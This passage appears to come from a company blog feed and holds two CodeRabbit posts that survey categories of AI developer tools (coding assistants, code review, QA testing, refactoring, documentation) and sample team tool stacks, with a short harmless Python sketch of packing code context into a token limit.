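print(default_role("github", None, added_manually=True))
```

An admin can still override any of these defaults by hand, so a lookup like this only describes the starting point for each user.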

AI dev tool stack: How engineering teams are using AI

Aravind Putrevu — Tue, 10 Jun 2025 00:00:00 GMT

In our last post, we covered why we think [2025 is the year of the AI tech stack](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack), walked through the layers in the stack, and shared some sample stacks we’ve been seeing teams use. Here, we'll dive deeper into how teams are actually putting these tools to work.

We’ll look at the stack’s layers, the different types of tools in each, and how developers are using these AI tools to speed up their development process or tackle common pain points from adopting AI coding tools. From codebase context tools that help you prompt AI assistants better to AI code review tools with agentic actions, each layer brings unique solutions to real-world headaches, both those that have always existed and the ones that are specific to AI coding tools. We’ll walk through practical examples and share how we’re seeing teams integrate AI at every step.

## The AI dev tool tech stack

![](https://victorious-bubble-f69a016683.media.strapiapp.com/e805deb9842da19bfe8b9222848bac27a844f885f3f2d53da65fd72b1b0cd092_d738062109.png)

As we mentioned in our previous post, teams are increasingly building out AI dev tool stacks: layered sets of AI-powered tools designed to support each stage of the software development lifecycle. Here's a quick overview of the stack's layers, how they connect, and why you'll likely start using most of these tools soon.

* **Foundational:** AI coding assistants
* **Essential layer:** AI code review tools
* **Optional layer:** AI QA test tools
* **Optional layer:** AI refactoring tools
* **Optional layer:** AI documentation tools

## Foundational: AI coding assistants

![](https://victorious-bubble-f69a016683.media.strapiapp.com/8f111878aca44b0f1cc1d40b6628b2969005011e3eb82a0ddbf643fa8b992a7b_5e062c0617.png)

AI coding assistants are the foundation for most teams adopting AI tools.
Previously, we talked about how these tools [span a wide variety of functions](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack), from accelerating coding by suggesting autocompletes to generating entire functions and components from simple prompts. Increasingly, developers use multiple coding assistants, choosing different tools for different strengths and personal preferences – which helps boost overall productivity and satisfaction. A great example of this is how [ChargeLab was able to improve productivity by 40%](https://leaddev.com/culture/ai-coding-mandates-are-driving-developers-to-the-brink) by allowing their developers and teams to choose which AI tools to adopt.

We break these tools into five categories – though many tools span multiple categories.

### **Tab completion tools: *Autocomplete but smarter***

**Tools**: GitHub Copilot, Cursor Tab, Windsurf, Tabnine, Sourcegraph Cody, Qodo, JetBrains

* These tools don’t try to build your entire app. Instead, they help you write code faster and save cognitive effort by providing contextual code suggestions for repetitive coding tasks inside your IDE.
* While the buzz around AI coding tools is currently focused on agentic capabilities, tab completion remains the most commonly used AI functionality in the companies we’re talking with. We estimate that around 90% of AI coding tool use has so far been with autocomplete tools. That’s likely because they focus on complementing the developer rather than doing work independently, so they are less likely to introduce bugs or require significant editing.
* Some developers prefer tab completion tools over other types of AI assistants since they give them more control over the code they write while still offering time savings over writing it themselves. Their use also tends to be focused on automating simple things like class and interface names. For that reason, they’re easy for any dev to use.
* Increasingly, tab completion tools are more context-aware and predictive – understanding the context of your codebase and not just the code you’re currently working on.

### **AI coding assistants: *Context-aware, multi-purpose tools***

**Tools**: GitHub Copilot, Cursor, Windsurf, Claude Code, OpenAI Codex CLI, Traycer, Zed, Cody by Sourcegraph, Aider, Qodo, Cline, Roocode, Blackbox, OpenHands, Gemini Code Assist, Augment Code, Amazon Q, JetBrains AI Assistant

* AI coding assistants are often part of a new breed of AI-native editors that offer a number of AI coding tools like tab completion, code generation, AI chat, and agentic coding capabilities.
* AI coding assistants are best at writing entire blocks of code with inline explanations. They can be incredibly effective at bootstrapping first drafts of new features, generating unit tests, and refactoring. However, they’re more likely to add bugs and issues to your code than a tab completion tool and generally require good prompting to get good results – as [this tweet by Cursor](https://x.com/ryolu_/status/1914384195138511142?s=46&t=v44WRRwh6MCK7nZNelMHxA) attests. For this reason, the quality of suggestions varies depending on the developer's prompting expertise.
* Because AI assistants can answer questions as well as generate code, they also help reduce context switching (and time spent on Stack Overflow) when writing code yourself.
* While most AI coding assistants are IDE-based, like Cursor, JetBrains, Windsurf, Zed, and Copilot (which is in VS Code), some also operate in the CLI, including Claude Code, Aider, and OpenAI’s Codex.
* AI coding assistants are more context-aware than tab completion tools and focus on learning your codebase and coding style over time to increase the relevance of their suggestions.
### **Agentic coding tools: *The next frontier (but pricey)***

**Tools**: Cursor, Windsurf, GitHub Copilot, Claude Code, OpenAI Codex, Cline, Roocode, Blackbox AI, Continue, Devin, Jules, Augment Code, OpenHands

* These tools often overlap with AI coding assistants, but we’ve put them in their own category since not all assistants have agentic capabilities and some coding agents are more focused on agentic coding.
* These tools are able to analyze your codebase to determine how best to approach coding tasks or solve problems. Then, autonomous or semi-autonomous agents work to solve those problems or complete tasks like writing tests, testing code, installing packages, fixing issues in code, or generating new code and raising PRs based on your requests. They can also understand your codebase and summarize files.
* Typically, they have the ability to execute specific tasks including modifying code and creating files. They are also integrated into your development environment and can interact with your tools.
* Some, like Devin, Claude Code, and OpenAI Codex, can execute tasks autonomously without direct supervision, while others, like Copilot and Windsurf, make suggestions that you have to approve. Depending on the task, developers might prefer one or the other type of tool.
* Agentic coding tools are still in the early stages but are evolving fast. In the right hands and with the right tasks, they can offer major returns, or create really creative new bugs.

### **AI app generator tools: *Generate an app or website fast***

**Tools**: Lovable, v0, Bolt, Builder.io, Figma Make, Fine.dev, Stitch

* These tools focus on quickly generating entire apps or websites rather than simply completing individual lines of code or generating features. They promise to build full-stack applications rapidly, from frontend UI design to backend infrastructure setup, and are integrated with cloud databases.
For that reason, they primarily appeal to non-developers. They also likely herald the end of no-code tools since they simplify the process even more.
* The increasing popularity of app-generation tools among developers is, therefore, often driven by quickly prototyping new ideas rather than creating something that will end up in production.
* App-generation tools are more agentic than code generation tools and handle a broader scope of the development process. This can mean significant initial time savings but might require more oversight and editing downstream to customize generated apps to exact specifications. Many devs also question whether a generated app can actually be ready for production.
* App-generation tools are rapidly becoming more sophisticated – allowing developers to describe application ideas while AI translates these descriptions into functional codebases with minimal manual intervention. However, they remain of limited use to many developers who typically work on pre-existing codebases and applications.

### **Codebase context tools: *Up-to-date codebase context***

**Tools:** Repomix, Repo Prompt, Context7

* These tools are crucial enablers for AI-assisted software development. They structure and deliver relevant slices of large codebases to AI models, giving the AI the context it needs to reason effectively across many files.
* Developers simply prompt an AI assistant and these tools curate the most relevant parts of the codebase to feed into the model, ensuring the assistant isn’t flying blind in large or complex projects.
* Codebase context tools can also help compress and structure prompts for AI agents so they can maintain a functional understanding of a large codebase within stated token limits, improving the quality of your generated code while reducing the cost when using tools with consumption-based pricing.
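To make the idea of fitting relevant code into a token limit concrete, here is a minimal sketch of greedy context packing. It is not how Repomix, Repo Prompt, or Context7 work internally. The function names, the relevance scores, and the rough "four characters per token" estimate are all assumptions made for illustration.

```python
def estimate_tokens(text):
    """Very rough token estimate (assumption: about 4 characters per token)."""
    return max(1, len(text) // 4)


def pack_context(files, scores, budget):
    """Greedily pick the most relevant files that fit within a token budget.

    files:  dict mapping path -> file contents
    scores: dict mapping path -> relevance score (hypothetical, higher is better)
    budget: maximum number of estimated tokens to include
    Returns (chosen_paths, tokens_used).
    """
    chosen, used = [], 0
    ranked = sorted(files, key=lambda path: scores.get(path, 0.0), reverse=True)
    for path in ranked:
        cost = estimate_tokens(files[path])
        if used + cost <= budget:  # skip files that would overflow the budget
            chosen.append(path)
            used += cost
    return chosen, used


# Made-up repository contents and relevance scores.
files = {"a.py": "x" * 400, "b.py": "y" * 800, "c.py": "z" * 200}
scores = {"a.py": 0.9, "b.py": 0.8, "c.py": 0.1}
chosen, used = pack_context(files, scores, budget=160)
print(chosen, used)
```

A greedy pass like this is the simplest possible strategy; real tools may also compress or summarize files instead of dropping them, which is part of how they reduce cost under consumption-based pricing.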
## Essential layer: AI code review tools ![](https://victorious-bubble-f69a016683.media.strapiapp.com/afc59b8ec3449753c93a8e26c0647434ca41bc01da6dc6d5b8a8983e43561fd1_c406a6103e.png) Next up are AI code review tools, a critical layer because they directly tackle the increased workload created by faster AI-assisted coding. In our [previous post](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack), we highlighted how these tools help teams better manage the growing volume of code produced, reducing burnout from manual reviews. AI-driven code reviews not only speed up the process by allowing teams to merge PRs significantly faster – but also greatly improve quality by catching bugs early, reducing reviewer fatigue, and standardizing best practices. Some, like CodeRabbit even have agentic workflows and can help with things like generating unit tests, making multi-file edits, or raising new PRs. After AI coding tools, AI code review tools are the AI tool dev teams are most likely to adopt — both to deal with [existing code review backlogs](https://www.coderabbit.ai/blog/tackling-a-legacy-codebase-and-high-defect-rate-after-an-acquisition?) and to address the glut of AI-written PRs of questionable code quality. Ultimately, they automate tedious tasks, freeing developers to focus on the high-impact work they genuinely enjoy. These tools come in three main flavors: ### **Features of an AI coding tool: *AI coding tools review themselves*** **Tools:** Cursor, GitHub Copilot, JetBrains, Windsurf Forge ([deprecated](https://windsurf.com/blog/forge-deprecation)) * Some AI coding assistants offer code review tools as features included in their subscriptions or as add-ons. For example, Cursor’s subscription includes IDE-based code reviews and GitHub Copilot’s subscription includes CI/CD-based reviews. Up until April 2025, Windsurf also offered Forge, a CI/CD-based code review tool that was an add-on to their service. 
However, they recently deprecated it and relaunched code reviews as a feature of their main AI coding assistant.
* To some, it makes sense to include AI code reviews in existing AI coding assistant tools since code reviews are such a core use case for AI in development. However, many question how effective a coding assistant can be when reviewing the code it generates.
* With code reviews, the best practice has always been to have peers or senior devs do reviews, with the goal of ensuring that several different sets of eyes look for potential issues. Having AI code reviews as a feature of coding assistants deviates from this central security and quality protocol. How can you expect the AI tool that added 41% more bugs to your code to find any of those bugs if it didn’t realize they were bugs to begin with?
* What’s more, AI coding assistants often prioritize low latency and real-time responses, which can lead to more superficial code reviews than those from standalone AI code review tools that focus on quality.
* Forge’s deprecation also suggests that, as a feature or an add-on, code reviews are unlikely to be a core focus of product development by AI coding assistants – especially as the space becomes more competitive and companies devote more time to improving their core offerings. That likely means standalone solutions will be more comprehensive and have more features, making them able to deliver additional value.

### **Git-based AI code review tools: *Reviews that save teams time***

**Tools:** CodeRabbit, Bito, Greptile, Qodo, Graphite Diamond

* These tools run automatic reviews when you open a pull request. First-pass AI code reviews find bugs, security vulnerabilities, syntax errors, stylistic issues, and more, saving senior engineers the time they would otherwise spend commenting on those issues themselves.
* These tools fit perfectly within your CI/CD workflow and existing code review processes while offering PR summaries and 1-click fixes to make it easier to both review and fix issues.
* With codebase awareness and enhanced context, these tools can catch common issues early, find bugs you might miss, and enhance code quality across your codebase.
* Offerings like CodeRabbit even have agentic chat and workflows, allowing you to do things like generate docstrings and unit tests, make multi-file edits, raise PRs, and more by simply chatting with the AI reviewer.
* Having AI code reviews at the CI/CD stage is critical to streamlining the code review process while implementing code quality standards across the codebase.

### **Both IDE and Git-based AI code review tools: *Reviews at every stage***

**Tools:** CodeRabbit, SonarQube, Qodo, Sourcery

* Few AI code review tools offer code reviews in both the IDE and CI/CD. Those that do provide the most comprehensive code review support by reducing bugs at multiple stages of the development cycle.
* Connecting IDE and CI/CD reviews also enables multilayer reviews, which makes for a more seamless workflow and additional quality checks.

## Optional layer: AI QA test generation & execution tools

We [previously discussed](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack) how QA testing has traditionally incorporated forms of machine learning or AI, but newer tools are going even further by automating the most repetitive and time-consuming aspects of testing. These AI-powered tools generate extensive and realistic test scenarios from simple descriptions, significantly speeding up the testing process. Beyond speed, they also enhance test coverage by considering numerous permutations a human tester might overlook. Additionally, some of these tools offer "self-healing" features that automatically update tests when your app’s UI or underlying data changes.
We break these down into two categories:

### **AI test generation tools: *Test generation-only***

**Tools**: Testim, Mabl, Functionize, testRigor, Autify, ACCELQ, Qodex, Tricentis

* AI test generation tools don’t run or manage tests. Instead, they automate the creation of test cases, scripts, or scenarios based on natural-language descriptions or by analyzing existing code paths.
* Their main appeal is reducing the tedious, repetitive work of manually defining each individual test case to help QA engineers rapidly build out robust test suites.
* Developers and QA teams appreciate these tools because they speed up initial test creation and are especially useful when expanding test coverage for large, complex, or legacy applications.
* While great for generating volume quickly, these tools typically require manual fine-tuning and review to ensure accuracy and coverage.
* Increasingly, these tools leverage deeper context-awareness to parse existing code and user journeys more intelligently, so they can propose test cases that closely align with real-world use cases.

### **AI test execution and maintenance tools: *End-to-end AI test support***

**Tools**: MuukTest, Applitools, Sauce Labs, Perfecto, Meticulous

* Full-lifecycle AI QA tools go beyond test generation and handle the entire testing process – from writing test cases to executing them automatically and even maintaining them as your application evolves.
* Teams often favor these comprehensive tools because they dramatically reduce QA workload by automating not just initial test creation but also the ongoing upkeep required when the codebase or UI changes.
* Though these tools significantly ease maintenance burdens, they can sometimes struggle with intricate or complex scenarios.
* Increasingly sophisticated, these tools integrate seamlessly into existing CI/CD workflows, providing continuous, automated testing coverage across multiple environments and deployment stages.
## Optional layer: AI Refactoring tools ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d82e39f6537abd0aa84d8f6af8991ba473e2b0b5cf899460c0546cd93868c577_da5925aba7.png) Another crucial area is AI refactoring tools. While general AI coding assistants may claim refactoring capabilities, their outcomes often fall short. This has led many teams to adopt specialized AI refactoring tools explicitly designed for optimizing and improving codebases. These dedicated tools automate tedious tasks, quickly identifying and performing refactoring opportunities based simply on natural-language instructions, drastically cutting down manual effort and enhancing code maintainability. We divide these tools into two types: ### **Semi-automated tools: *The tab completion of refactoring tools*** **Tools:** CodeGPT, GitHub Copilot, Amazon CodeWhisperer, Sourcegraph Cody * Semi-automated refactoring tools don’t completely take the wheel. Instead, they proactively suggest code improvements within your IDE allowing you to quickly accept, reject, or modify each suggestion. * These tools focus on smaller-scale, incremental refactors—like simplifying methods, restructuring loops, or optimizing function logic—that benefit from a human eye before committing. * Developers prefer semi-automated tools for complex or sensitive refactoring tasks because they offer fine-grained control. * The appeal lies in their balance. They speed up routine refactors while leaving room for developer judgment — minimizing the risk of unwanted changes or subtle bugs sneaking into production. * Increasingly, semi-automated refactoring tools leverage deeper context-awareness, analyzing the broader codebase to offer smarter, more relevant suggestions. 
### **Fully automated tools: *When you want to give AI more autonomy*** **Tools**: Claude Code, Devin, OpenAI Codex * These AI tools handle large-scale, repetitive refactoring tasks automatically across your entire codebase, often from just a single set of instructions or rules. * While semi-automated tools highlight refactoring opportunities for devs to review manually, fully automated tools excel at bulk tasks—such as upgrading dependencies, migrating frameworks, or standardizing code styles—potentially saving hours of repetitive work. * These tools appeal to teams looking to tackle technical debt at scale without spending days manually applying the same refactor across hundreds or thousands of files. * Developers appreciate their reliability and consistency for clearly defined, repetitive refactors, but fully automated tools generally work best when given explicit rules. They’re less suited for nuanced code improvements that require human judgment. * Increasingly, fully automated refactoring tools can parse multiple programming languages and integrate directly into existing CI/CD pipelines. ## Optional layer: AI documentation tools ![](https://victorious-bubble-f69a016683.media.strapiapp.com/30bbfaffd165ae932ee1cb25f722a381fa7006901e3fcd18200cff80da072a57_86808da231.png) Finally, AI documentation tools, while not usually the first thought when adopting AI, have proven incredibly valuable. As we previously noted, these tools tackle the often-dreaded task of writing and updating code documentation such as inline comments and docstrings. By leveraging AI, developers can quickly generate clear, accurate, and up-to-date documentation directly from their codebase, saving significant time and effort that would otherwise be spent manually maintaining documentation. 
### **Code-level docs tools:** **Tools**: DeepWiki, Cursor, CodeRabbit, Swimm, GitLoop, GitSummarize * AI documentation tools analyze code structures and behaviors to produce readable, context-aware documentation drafts automatically—potentially cutting documentation time in half or more by generating inline comments, docstrings, API references, or even internal design and architecture docs. * These tools appeal to teams wanting to keep documentation continuously synchronized with code changes without manually updating every function comment or API description as the code evolves. * Increasingly, AI documentation tools support multiple programming languages and integrate directly into IDEs and CI/CD pipelines, proactively prompting devs to document their code as they write it, thus improving doc quality and reducing technical debt over time. ## Building your own AI dev tool stack ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f64c8c6561c371af7cee66d453b87fcf310af6b1b4163339b6cc434036b526fb_9895cb57a5.png) Adopting an [**AI dev tool stack**](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack) isn’t about just throwing a couple new AI tools into the mix. It’s about strategically bringing AI into every part of your development workflow. Using AI strategically at every step – from coding and reviewing to testing, refactoring, and documenting –can help your team get more done, reduce frustration, and significantly boost the overall quality of your codebase. We’d love to hear more about how you’re building your [AI dev tool stack](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack) and what’s working for you. Tag us on [Twitter](https://x.com/coderabbitai) or [LinkedIn](https://www.linkedin.com/company/coderabbitai). ***Interested in trying out our AI code review tool? 
Get a*** [***14-day free trial!***](https://app.coderabbit.ai/login?free-trial&_gl=1*1h48txm*_gcl_au*MjAwMTM2Mjk0MC4xNzQ0OTI5MzMx*_ga*NTAxMzUzODg4LjE3NDQ5MjkzMzE.*_ga_7YWHDJSXQ1*czE3NDk1MTI5OTQkbzcxJGcwJHQxNzQ5NTEyOTk0JGo2MCRsMCRoMTUzMTQ4NzEwMw..)

2025: The year of the AI dev tool tech stack

Aravind Putrevu — Tue, 10 Jun 2025 00:00:00 GMT

In April, Microsoft and Google announced that AI is generating 30% of the code at their companies. That indicates that AI coding tools have entered a new phase. They’ve become a [significant part of engineering workflows](https://x.com/deedydas/status/1917620131301318988) – even at large, enterprise companies. With [Dev Twitter](https://x.com/dok2001/status/1919734470703267975?s=46) [obsessed](https://x.com/xf1280/status/1919784079681065455?s=46) with [vibe coding](https://x.com/romainlaffitau/status/1918374724389798019?s=46b) these days, the question many devs we’ve been talking to are asking is what does all this AI use actually look like? Are developers vibe coding whole features for production using agentic coding capabilities? Or are they using AI primarily for tab completion and early prototyping? ![](https://victorious-bubble-f69a016683.media.strapiapp.com/072ca73c1386b1afb778f828d8e90425135b7e92acf9fa91d301c59a4080b15c_7bf7463138.png) Ultimately, devs want to know what successful AI adoption really looks like across teams, companies, and industries. What AI tools are teams *actually* using? How are they getting *real value* from them? What rules, if any, are companies putting in place around AI usage? Are AI coding tools *really* boosting productivity or just helping teams code faster, but with more bugs? At CodeRabbit, we talk to hundreds of engineering teams every month about how they're using AI. That gives us early visibility into trends around AI adoption, and in the last few months, we've seen striking similarities in the ways development teams are thinking about AI. Let’s dive into what we’re hearing from customers – and why it’s convinced us 2025 is the year of the AI dev tool tech stack. ## Everyone has AI pain points now It likely comes as no surprise that the teams we talk to tell us that one of the major pain points of their AI coding tools is that the productivity and DevEx gains they deliver are inconsistent. 
With studies finding that AI coding tools can add up to [41% more bugs](https://resources.uplevelteam.com/gen-ai-for-coding) to your code, these tools have come with new challenges. A couple of weeks ago, Ryo Lu, Cursor’s Head of Design, [wrote a thread](https://x.com/ryolu_/status/1914384195138511142?s=46&t=v44WRRwh6MCK7nZNelMHxA) about the potential downsides of using Cursor to write code. In it, he listed 12 steps to take if you don’t want to end up with AI spaghetti you’ll be cleaning up all week. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b04184e9bf8e865899cbcf7d88ca5cb03e5ae349c954f228e47b42d14d2eb7a6_0f1c94d362.png) A tool that requires a 12-step guide for avoiding disastrous spaghetti code might be fine if you’re vibe coding a hobby project or on a team of mostly senior devs who can catch and edit out the spaghetti, but imagine what a junior developer could do to a legacy codebase in a highly regulated Fortune 500 company! In addition to more bugs and issues, we’re also hearing that AI coding tools have created bottlenecks at other points of the development cycle. It goes without saying that if you’re writing more code, you have to *review* more code, *test* more code, *document* more code, and *refactor* more code. Very quickly, your ‘*game-changing*’ AI productivity gains get held up at other manual parts of the development cycle. And that work can be harder and more time consuming given AI-generated code’s tendency to have more issues. ## A new way to code = A new tech stack ![](https://victorious-bubble-f69a016683.media.strapiapp.com/143b3a91ac21c68e1b4e197a43a2705a87b1fb16b68b0238a09c4fc4a2516f1e_9ad94257d5.png) That’s why [many devs](https://x.com/PrajwalTomar_/status/1932051939703058611) have come to an important realization this year: You can’t just introduce a transformative technology and leave the rest of the software development cycle intact. You need an end-to-end AI dev tool tech stack. 
It’s common for disruptive technologies to spark broader ecosystem changes. A great example is how GitHub’s 2008 launch led to the launch of both CircleCI and Jenkins three years later. AI coding tools seem to be following an even faster timeline. After a few years of using them, engineering leaders have realized that AI coding tools sometimes help but sometimes hurt, too. To *actually* realize the promised productivity gains, they need additional tools for the downstream tasks that AI coding tools create or make more difficult. But this shift to thinking about AI adoption as a stack is also about taking the approach that worked for code generation, leveraging AI to boost productivity, and applying it to other manual tasks. Why not review faster and test faster if you’re coding faster? Especially since almost no one *loves* reviewing code or writing tests? In some cases, the ROI of leveraging AI at other stages of development might even be higher than what AI coding assistants deliver. That’s because those AI tools work to remove bugs from code rather than adding them in. ## What’s in the AI dev tool tech stack? ![](https://victorious-bubble-f69a016683.media.strapiapp.com/591b45bf79c18a9b4b11c23c1a954fbf21e08b857dd21cb716ca86b416b98496_4421ed4fd8.png) The AI dev tool stacks we’re seeing our customers adopt are a layered set of AI tools that support every stage of the software development lifecycle. Here’s a quick look at the layers of that stack, how they fit together, and why you’ll probably be using most of them by the end of this year – if you aren’t already. * **Foundational:** AI coding tools * **Essential layer:** AI code review tools * **Optional layer:** AI QA test tools * **Optional layer:** AI refactoring tools * **Optional layer:** AI documentation tools ## Foundational: AI coding tools ![](https://victorious-bubble-f69a016683.media.strapiapp.com/568178634acf84dbbc057eca6bacef3cbe0050b9446b5dcd50eca8fba0bf00de_85887cb225.png) This is where most teams start.
These tools help developers write code faster – either by suggesting autocompletes of what you’re currently writing or by generating entire functions, tests, or components based on natural language prompts. Over time, they’ve become more sophisticated with deeper codebase awareness, a greater commitment to code quality, and a recent focus on agentic, multi-step tasks. But these tools are still notorious for introducing bugs, vulnerabilities, and performance inefficiencies into code. That translates into developers doing a lot more code editing and reviewing. Increasingly, we’re hearing two things. First, devs aren’t just using one tool but often leveraging multiple tools based on what each tool is best at (a process satirized in [this tweet](https://x.com/aidenybai/status/1913634950236291562)). Second, devs are increasingly opinionated about which tool or tools they want to use – with the choice of an AI coding assistant becoming as divisive as whether to use a PC or a Mac. That’s led many teams to start giving developers a choice around AI assistants rather than choosing just one to buy licenses for. Given that they’re likely to also be more effective at using the tool they prefer – that benefits companies, too. We break these tools into five categories – though many tools span multiple categories. 
* **Tab completion tools:** GitHub Copilot, Cursor Tab, Windsurf, TabNine, Sourcegraph Cody, Qodo, JetBrains * **AI coding assistants:** GitHub Copilot, Cursor, Windsurf, Claude Code, OpenAI Codex CLI, Traycer, Zed, Cody by Sourcegraph, Aider, Qodo, Cline, Roocode, Blackbox, OpenHands, Gemini Code Assist, Augment Code, Amazon Q, JetBrains AI Assistant * **Agentic coding tools:** Cursor, Windsurf, GitHub Copilot, Claude Code, OpenAI Codex, Cline, Roocode, Blackbox AI, Continue, Devin, Jules, Augment Code, OpenHands * **AI app generator tools:** Lovable, v0, Bolt, Builder.io, Figma Make, Fine.dev, Stitch * **Codebase context tools:** Repomix, Repo Prompt, Context7 ## Essential layer: AI code review tools ![](https://victorious-bubble-f69a016683.media.strapiapp.com/856febd32378fbf365f528185cb10c30a2e1d3b190a3530a76c559ab3af61e9a_50e17e0c5a.png) AI code review tools sit at the center of the stack because they directly address the biggest bottleneck introduced by AI coding tools: the review process. If your code is getting written faster – and more often – by machines, then you need a better way to review it. Trying to manually review ever more code as a team isn’t just a recipe for burnout; it also risks [quality degradation](https://www.atlassian.com/blog/add-ons/code-review-best-practices). Research shows that most devs can only manually review up to ~400 lines of code before fatigue sets in. That fatigue could mean devs miss more critical bugs and then have to address them in production. Indeed, code review tools don’t just help you merge PRs up to 4x faster and reduce the time you spend reviewing by up to 50%. They are also essential in AI-assisted development to keep bugs from production given that AI coding tools have been found to [add up to 41% more bugs to code](https://resources.uplevelteam.com/gen-ai-for-coding). Using them protects your AI productivity savings by helping keep bad code out of production.
AI code reviews also help improve code quality, reduce reviewer fatigue, and standardize best practices across teams no matter which AI coding assistants your team members are using. Unlike code generation and agentic coding tools, their output isn’t wildly inconsistent since it doesn’t depend on how well any individual developer knows how to prompt them. But, perhaps more importantly, they leverage AI for what it’s best at – automating repetitive and tedious tasks devs don’t want to do. Who wants to spend an hour adding a dozen comments to a PR when AI can add most of those comments for you, give you easy 1-click fixes for each of them, and find bugs you might have missed? These tools come in three main flavors: * **Features of an AI coding tool:** Cursor, GitHub Copilot, JetBrains, Windsurf Forge (deprecated) * **Git-based AI code review tools:** CodeRabbit, Bito, Greptile, Qodo, Graphite Diamond * **Both IDE and git-based AI code review tools:** CodeRabbit, SonarQube, Qodo, Sourcery ## Optional layer: AI QA test generation & execution tools ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0c6681ef330815125625f1e38a6973e593d8c51d7582baed4728da1bfb439da7_24cc51678a.png) For many dev teams, QA testing has long included some form of AI. But a new generation of AI-powered QA tools promises to automate even more of the grunt work – especially around generating and maintaining tedious end-to-end tests that simulate real user journeys. Instead of manually thinking up every scenario, you can let an AI generate test cases or even entire test scripts from a natural language description of what needs to be checked. The benefits are hard to ignore. The most important is speed – they can churn out or execute suites of tests in a fraction of the time and generate dozens of scenarios at once. However, they also help achieve greater breadth of coverage by running through permutations a human might overlook or not have time for.
Some even offer self-healing capabilities to adjust tests when your UI or data changes, reducing maintenance headaches and keeping your test suite running smoothly as the app evolves. We break these down into two categories: * **AI test generation tools:** Testim, Mabl, Functionize, testRigor, Autify, ACCELQ, Qodex, Tricentis * **AI test execution and maintenance tools:** MuukTest, Applitools, Sauce Labs, Perfecto, Meticulous ## Optional layer: AI Refactoring tools ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a3551f366d32a27481d19704a3399582f4480d576bc68867a88299adfbeacfde_7889c2d1f0.png) While some AI coding tools claim they can be used for refactoring, their results are often lackluster. For that reason, many companies adopt AI tools created explicitly for refactoring code as part of their AI dev tool tech stack after they’ve had bad experiences attempting to use coding tools for that use case. AI-powered refactoring tools promise to automate the tedious and repetitive aspects of improving your codebase, from minor optimizations to significant architectural changes. Instead of spending hours manually hunting down inefficiencies or repeating the same structural tweaks across your codebase, these AI tools quickly identify and even execute refactoring opportunities from a simple natural-language description. We divide these tools into two types: * **Semi-automated tools:** CodeGPT, GitHub Copilot, Amazon CodeWhisperer, Sourcegraph Cody * **Fully automated tools:** Claude Code, Devin, OpenAI Codex ## Optional layer: AI documentation tools ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dede774fe55301a163152c94c5917760b27de2cbc30d0283d466f7b5d7b6bd00_a2d25e7ac7.png) While docs are never the first thing that teams think about when adopting AI, documentation is one task they appreciate getting help with when they do. These tools tackle one of coding’s most dreaded tasks – writing and updating code documentation, from inline comments to docstrings.
Instead of manually documenting every new function or combing through outdated guides, devs can let AI tools quickly draft readable, up-to-date documentation directly from the code itself, saving countless hours of tedious work. * **Code-level docs tools:** DeepWiki, Cursor, CodeRabbit, Swimm, GitLoop, GitSummarize ## Sample stacks So, what do some of these AI dev tool tech stacks look like? We’ve seen a range of configurations from company to company but here are some common stacks teams are using. ### ‘Comprehensive’ stack ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dc677d38553cda417b410d1846de9e2bd896aaff8518f9e28d1c9f85d441ffd9_bafa88344b.png) There’s a growing group of companies we encounter who have implemented or are in the process of implementing an end-to-end AI dev tool stack that includes an AI-powered coding tool, code review tool, QA tool, refactor tool, and docs tool. These are typically companies where there’s been significant internal leadership around AI adoption either from the C-Suite or engineering. They were also often early adopters of AI coding tools and have already seen their benefits so are looking for additional AI productivity and DevEx gains. ### ‘Choose-your-own-AI-tool’ stack ![](https://victorious-bubble-f69a016683.media.strapiapp.com/20ddda89e7480ffa3b79c519c77c06a786d69ac9364b27d5b22f93165141c28f_8d09a10bc9.png) We are increasingly seeing companies that are implementing AI tools throughout the development cycle AND giving their team more choice as to which tools they use. These companies understand (or have learned the hard way) that different AI tools are best suited for different kinds of work and that the best AI tool for any developer is the one they feel most comfortable prompting. This strategy hasn’t just anecdotally helped increase AI adoption but it’s also improved developer satisfaction and experience at these companies. That’s because, increasingly, developers are opinionated about which tool they use. 
Some companies offer developers choice over just their AI coding tool (Cursor, Copilot, or Claude Code?) while others will offer devs choice over other tools in the stack, as well. ### ‘Multiple coding tools’ stack ![](https://victorious-bubble-f69a016683.media.strapiapp.com/da51ac0a43aac63ea24646e474d27b19ef78659bc1bdee7d5557987c3dbba3ad_9c4d39598e.png) Not to be outdone by the companies that let developers choose their own AI tools are the companies that let devs choose multiple AI coding tools. Maybe they use Lovable for prototyping UI and then Cursor to write the app. Or they use TabNine for code completion and ChatGPT for code generation. More companies are saying yes to developers using more than one tool if they can make the case for why it will improve their productivity. ### ‘Partial’ stack ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dffe9ca97181d0a7c99c204c91b8c25dc78da33ee12cccc322432f5caed93a20_edec241339.png) Not all companies that we’re seeing building an AI dev tool stack are adopting all the tools in the stack. Typically, however, their stacks involve an AI coding tool, an AI code review tool, and another AI tool from our list – be that an AI refactoring tool, an AI QA tool, or an AI docs tool. Which they adopt often depends on their codebase, internal expertise, and needs. For example, larger companies are more likely to adopt AI QA tools since they have a large enough team internally to manage QA whereas smaller companies are more likely to mostly outsource QA to contractors and agencies. ### ‘Essential’ stack ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2b3f0291b5b2e99345b6a09a139e3a5b41e63f64f2fc7401175839c78b8a14a7_207052fc4c.png) Finally, we see a lot of companies building just an ‘essential’ stack which includes just an AI coding tool and an AI code review tool to help navigate the added bugs and more complicated code reviews that typically result from using coding assistants. 
